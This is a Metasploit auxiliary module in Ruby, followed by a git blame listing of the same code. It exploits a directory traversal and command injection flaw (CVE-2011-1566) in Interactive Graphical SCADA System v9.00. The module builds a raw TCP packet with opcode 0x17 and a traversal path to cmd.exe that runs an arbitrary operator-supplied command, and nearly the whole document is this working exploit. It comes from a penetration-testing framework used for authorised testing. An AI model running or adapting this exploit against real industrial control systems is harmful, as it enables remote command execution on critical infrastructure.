metasploit-framework/modules/auxiliary/admin/scada/igss_exec_17.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Interactive Graphical SCADA System Remote Command Injection',
			'Description'    => %q{
					This module abuses a directory traversal flaw in Interactive
				Graphical SCADA System v9.00. In conjunction with the traversal
				flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
				may be able to execute arbitrary system commands.
			},
			'Author'         => [ 'Luigi Auriemma', 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2011-1566'],
					[ 'OSVDB', '72349'],
					[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
				],
			'DisclosureDate' => 'Mar 21 2011'))

		register_options(
			[
				Opt::RPORT(12397),
				OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
			], self.class)
	end

	def run

		connect

		exec = datastore['CMD']

		packet =  [0x00000100].pack('V') + [0x00000000].pack('V')
		packet << [0x00000100].pack('V') + [0x00000017].pack('V')
		packet << [0x00000000].pack('V') + [0x00000000].pack('V')
		packet << [0x00000000].pack('V') + [0x00000000].pack('V')
		packet << [0x00000000].pack('V') + [0x00000000].pack('V')
		packet << [0x00000000].pack('V')
		packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
		packet << "windows\\system32\\cmd.exe\" /c #{exec}"
		packet << "\x00" * (143 + exec.length)

		print_status("Sending command: #{exec}")
		sock.put(packet)
		sock.get_once(-1,0.5)
		disconnect

	end

end
added auxiliary module igss_exec_17.rb git-svn-id: file:///home/svn/framework3/trunk@12077 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-23 01:58:09 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
added auxiliary module igss_exec_17.rb git-svn-id: file:///home/svn/framework3/trunk@12077 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-23 01:58:09 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Interactive Graphical SCADA System Remote Command Injection',`
			`'Description' => %q{`
			`This module abuses a directory traversal flaw in Interactive`
			`Graphical SCADA System v9.00. In conjunction with the traversal`
			`flaw, if opcode 0x17 is sent to the dc.exe process, an attacker`
			`may be able to execute arbitrary system commands.`
			`},`
			`'Author' => [ 'Luigi Auriemma', 'MC' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
add/fix some cve and osvdb refs git-svn-id: file:///home/svn/framework3/trunk@13270 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-21 01:10:40 +00:00			`[ 'CVE', '2011-1566'],`
Msftidy run against a bunch of whitespace violations, a few line too longs. git-svn-id: file:///home/svn/framework3/trunk@13962 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 02:42:01 +00:00			`[ 'OSVDB', '72349'],`
added auxiliary module igss_exec_17.rb git-svn-id: file:///home/svn/framework3/trunk@12077 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-23 01:58:09 +00:00			`[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],`
			`],`
			`'DisclosureDate' => 'Mar 21 2011'))`

			`register_options(`
			`[`
			`Opt::RPORT(12397),`
			`OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),`
			`], self.class)`
			`end`

			`def run`

			`connect`

			`exec = datastore['CMD']`

			`packet = [0x00000100].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000100].pack('V') + [0x00000017].pack('V')`
			`packet << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000000].pack('V')`
			`packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"`
			`packet << "windows\\system32\\cmd.exe\" /c #{exec}"`
			`packet << "\x00" * (143 + exec.length)`
msftidy on aux modules, see #5749 2011-11-20 02:12:07 +00:00
added auxiliary module igss_exec_17.rb git-svn-id: file:///home/svn/framework3/trunk@12077 4d416f70-5f16-0410-b530-b9f4589650da 2011-03-23 01:58:09 +00:00			`print_status("Sending command: #{exec}")`
			`sock.put(packet)`
			`sock.get_once(-1,0.5)`
			`disconnect`

			`end`

			`end`